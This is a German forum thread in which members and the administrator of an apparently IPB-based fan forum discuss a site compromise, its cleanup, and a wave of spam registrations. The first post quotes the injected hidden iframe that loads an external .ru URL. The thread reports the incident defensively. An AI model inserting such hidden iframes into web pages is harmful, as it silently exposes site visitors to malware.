Jump to content

Forum gehackt!?


imagine
 Share

Recommended Posts

Bin ich der einzige, bei dem im auf der Forum-Startseite ein leere iframe angezeigt und dadurch das Forum zerschossen wird wird?

Im Quelltext finde ich nämlich des öfteren (ohne Leerzeichen)

< iframe style="display:none" src="http://assetgt.ru/l/kx/index.php?out=1352647585" width="0" height="0" >

Edited by imagine

Share this post


Link to post
Share on other sites

  • Administrators

So, nach mehreren Stunden Recherche und Suche von verdächtigen Dateien, ist das Forum hoffentlich wieder sauber.

Habe gestern Nacht gleich alle Passwörter geändert und das Security Patch installiert, was Anfang November rauskam, ich aber nicht gesehen habe, da ich nicht im Admin eingeloggt war und komischerweise auch keine IPB Mail bekommen habe. Außerdem war der oben angesprochene Iframe in einer Datenbank Tabelle (ipb_forums) hinter dem Namen jedes Unterforums eingefügt worden. Allerdings meist unvollständig, da die Anzahl Buchstaben für das Feld begrenzt ist.

Dann bin ich ins Bett, weil's einfach schon spät war (1 Uhr). Heute hab ich mich dann noch mal im IPB Forum schlau gelesen und hab den Server nach auffälligen Dateien durchsucht... neue Dateien, geänderte Dateien. Leider sind's überall irgendwie andere Dateien, weshalb sich das Ganze etwas schwierig gestaltet hat. Geänderte/neue Dateien befanden sich u.a. im Hooks sowie Uploads (Attachments, Profilbilder etc) Ordner & Public (Emoticons etc.) Ordner und deren zum Teil zahlreichen Unterordnern, es gab 2 zusätzliche Zeilen in den beiden Datenbank-Tabellen, in denen die Hooks abgelegt sind.

Hätte schlimmer sein können bei vielen waren alle index.php Dateien, config_global.php & Javascript Dateien betroffen.

Naja, jedenfalls denke ich, dass das Forum wieder sauber ist. Falls euch jedoch irgendwas auffällt, was nicht funktioniert oder irgendwelche Links/Frames auftauchen, die da normalerweise nicht sind oder eure Browser/Virenscanner etc. irgendwas melden, sagt bitte Bescheid. Dann bleibt mir nichts anderes übrig als alle Dateien vom Server zu löschen und die Original-Dateien vom Board hochzuladen... das hieße aber auch, dass ich alle Hooks, Modifikationen etc. neu installieren & anpassen müsste und genau das wollte ich eigentlich möglichst umgehen.

Außerdem gab es trotz der Sicherheitsfrage (Um wen dreht sich das Forum?) bei Registrierung in den letzten Tagen viele Spam-Anmeldungen. Die ganzen Wochen davor gab's maximal eine davon... gestern und vorgestern waren es 11 bzw. 24 Stück. Habe nun die Frage noch mal anders formuliert, weil jemand im IPB meinte, dass das zumindest vorerst das Problem gelöst hat und habe noch zusätzliche Fragen hinzugefügt (im Stil 2+5=?) um zusätzliche Sicherheit zu gewähleisten. Diese Fragen wechseln automatisch bei jedem Registrierungsversuch. Muss das gleich noch kurz testen, ob's auch alles funktioniert.

  • Like 3

Share this post


Link to post
Share on other sites

Danke, dass du dich so schnell drum gekümmert hast :hug:

Hab mich gestern schon über diese ganzen komischen Anmeldungen gewundert....

Share this post


Link to post
Share on other sites

  • Administrators

Naja, der Vorteil ist, dass IPB mittlerweile schon zusätzlich nen Filter drin hat, dass User, die es schaffen sich anzumelden, also die Captchas richtig eingeben und die Fragen richtig beantworten bei Registrierung, trotzdem wenn als Spammer bekannt, als solcher markiert und ggf. gebannt werden, je nachdem in welcher Stufe sie denjenigen einstufen (1-5). Somit waren diejenigen bereits als Spammer markiert und teilweise gebannt und konnten rein post-technisch keinen Unfug treiben. Ich hab sie dann gestern gleich gelöscht.

Wer gestern im Forum war als es etwas zerschossen aussah wegen der Iframes, sollte auf jeden Fall bei sich einen Viren(+ Malware)scan durchführen. Bei mir wurde jedoch nichts gefunden.

Share this post


Link to post
Share on other sites

Die Sache mit den Spam-Usern trotzdem Captcha und Sicherheitsfrage hatte ich btw. in meinen Forum in letzter Zeit auch öfters und die sind ja nicht auf IPB-Basis. Scheint wohl ein allgemeines Problem zu sein :nailfile:

Noch allgemein was: Ich habe es um 00:44h gesehen und war da ja bestimmt nicht der Erste. Wenn ihr beim einloggen so was seht, schreibt am besten was in der FB-Gruppe und wenn's die Frage ist, ob der nur bei euch so ist. Kann einfach viel Schaden verhindern. :)

Edited by imagine

Share this post


Link to post
Share on other sites

So, nach mehreren Stunden Recherche und Suche von verdächtigen Dateien, ist das Forum hoffentlich wieder sauber.

Habe gestern Nacht gleich alle Passwörter geändert und das Security Patch installiert, was Anfang November rauskam, ich aber nicht gesehen habe, da ich nicht im Admin eingeloggt war und komischerweise auch keine IPB Mail bekommen habe. Außerdem war der oben angesprochene Iframe in einer Datenbank Tabelle (ipb_forums) hinter dem Namen jedes Unterforums eingefügt worden. Allerdings meist unvollständig, da die Anzahl Buchstaben für das Feld begrenzt ist.

Dann bin ich ins Bett, weil's einfach schon spät war (1 Uhr). Heute hab ich mich dann noch mal im IPB Forum schlau gelesen und hab den Server nach auffälligen Dateien durchsucht... neue Dateien, geänderte Dateien. Leider sind's überall irgendwie andere Dateien, weshalb sich das Ganze etwas schwierig gestaltet hat. Geänderte/neue Dateien befanden sich u.a. im Hooks sowie Uploads (Attachments, Profilbilder etc) Ordner & Public (Emoticons etc.) Ordner und deren zum Teil zahlreichen Unterordnern, es gab 2 zusätzliche Zeilen in den beiden Datenbank-Tabellen, in denen die Hooks abgelegt sind.

Hätte schlimmer sein können bei vielen waren alle index.php Dateien, config_global.php & Javascript Dateien betroffen.

Naja, jedenfalls denke ich, dass das Forum wieder sauber ist. Falls euch jedoch irgendwas auffällt, was nicht funktioniert oder irgendwelche Links/Frames auftauchen, die da normalerweise nicht sind oder eure Browser/Virenscanner etc. irgendwas melden, sagt bitte Bescheid. Dann bleibt mir nichts anderes übrig als alle Dateien vom Server zu löschen und die Original-Dateien vom Board hochzuladen... das hieße aber auch, dass ich alle Hooks, Modifikationen etc. neu installieren & anpassen müsste und genau das wollte ich eigentlich möglichst umgehen.

Außerdem gab es trotz der Sicherheitsfrage (Um wen dreht sich das Forum?) bei Registrierung in den letzten Tagen viele Spam-Anmeldungen. Die ganzen Wochen davor gab's maximal eine davon... gestern und vorgestern waren es 11 bzw. 24 Stück. Habe nun die Frage noch mal anders formuliert, weil jemand im IPB meinte, dass das zumindest vorerst das Problem gelöst hat und habe noch zusätzliche Fragen hinzugefügt (im Stil 2+5=?) um zusätzliche Sicherheit zu gewähleisten. Diese Fragen wechseln automatisch bei jedem Registrierungsversuch. Muss das gleich noch kurz testen, ob's auch alles funktioniert.

Meine Güte hast Du da viel Arbeit mit dem ganzen Technikzeug.......

vielen vielen Dank!!!

Share this post


Link to post
Share on other sites

  • Administrators

Wie Stefan meinte, solltet ihr eure PCs überprüfen. Und nicht nur diejenigen, die gestern abend/nacht hier waren. Geänderte Dateien habe ich vom 15.11. und sogar vom 5.11. gehabt, also überprüft vorsichtshalber alle eure PCs sofern ihr in den letzten 2 Wochen im Forum wart, auch wenn unwahrscheinlich ist, dass es irgendwelche Schäden gibt o.ä.

Außerdem solltet ihr euren Browsercache leeren.

  • Like 1

Share this post


Link to post
Share on other sites

Vom 05.11 :wtf: :vomstuhlfall: Das hat sich dann aber sehr lange ich sag mal angekündigt, ohne das man's gesehen hat.

Edited by imagine

Share this post


Link to post
Share on other sites

Virus, Malware... irgendwas in der Art.

Wie gesagt, wenn ihr sowas seht bzw. euch was seltsam vorkommt, gleich was schreiben, da kann man solchen Vögeln die das machen wollen schnell in die Parade fahren.

Edited by imagine

Share this post


Link to post
Share on other sites

  • Administrators

Aus anderen Gründen werden Webseiten selten gehackt. Derjenige will immer irgendwie Schaden anrichten auf möglichst vielen PCs. :)

Share this post


Link to post
Share on other sites

Ich lass gerade mein Virenprogramm laufen. Da steht aber, dass im letzten Monat 65 Internet-Bedrohungen gestoppt wurden.

Aus anderen Gründen werden Webseiten selten gehackt. Derjenige will immer irgendwie Schaden anrichten auf möglichst vielen PCs. :)

Bestimmt kein Shakirafan :simpsons1:

  • Like 1

Share this post


Link to post
Share on other sites

  • Administrators

Was das für ne Webseite ist, ist solchen Leuten egal... es gibt Sicherheitslücken, also werden sie genutzt. Egal ob Shakira Forum, Online Shop, privater Blog oder was auch immer es noch so gibt.

Share this post


Link to post
Share on other sites

Ach so ist das also. Ich dachte die machen das gezielt, auf welche Website sie halt grad Lust haben^^

Share this post


Link to post
Share on other sites

Kann auch vorkommen, ist aber nur ganz selten der Fall und wenn dann wird es wohl auch nicht unbedingt "nur" ein Forum sein.

Share this post


Link to post
Share on other sites

Äh, bei Lara (barranquilla34) fehlt das Foto.. Ist nur nen Fragezeichen. Hat das damit was zu tun oder bin ich jetzt zu übertrieben aufmerksam? :angst: :vomstuhlfall:

Edited by cinzia
  • Like 1

Share this post


Link to post
Share on other sites

  • Administrators

Kann möglich sein. Ich hab vorsorglich alle neueren Fotos gelöscht, waren aber nur 3 oder 4. Hatte keine Lust zu checken, welches Foto zu welchem Member gehört (also hätte die Member ID dann vergleichen müssen), da erschien es mir einfacher eben die neuen Uploads zu löschen.

In dem Fall halt neues Foto hochladen bzw. das alte wieder hochladen. :)

Share this post


Link to post
Share on other sites

Achso, ja stimmt..ihr Foto war ziemlich neu :) Dann warst du das, dann ist ja gut :)

Share this post


Link to post
Share on other sites

  • Administrators

Bereits ein neuer Spam Account angemeldet (und gelöscht). Mal abwarten wie's morgen ist. Dummerweise nutzen viele @gmail.com als Adresse, was ich schlecht in den Ban Filter packen kann (und die IP Adressen sind immer völlig unterschiedlich). Andere Provider hab ich bereits als Ban Filter festgelegt. Echt merkwürdig, denn eigentlich war jetzt wirklich seeeehr lang Ruhe, was die Spam Accounts anging, hab ewig nichts mehr zum Ban Filter hinzugefügt bzw. hinzufügen müssen.

Share this post


Link to post
Share on other sites

  • Administrators

7 Anmeldungen allein heute nacht. Hab ja die Woche frei, werd dann heute abend oder spätestens morgen mal nach zusätzlichen Plugins/Hooks gucken um das Problem einzudämmen.

Gibt bspw. ein Plugin von StopForumSpam.com, was sehr gut sein soll.

Share this post


Link to post
Share on other sites

Boah Nadine, echt Respekt für den Einsatz :super:

Ich versteh nur Bahnhof bei deinem ersten Post :D

:dito: Eigentlich solltest du Geld dafür bekommen! :kicher:

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.

By continuing to browse this website or creating an account you also agree to our Privacy Policy.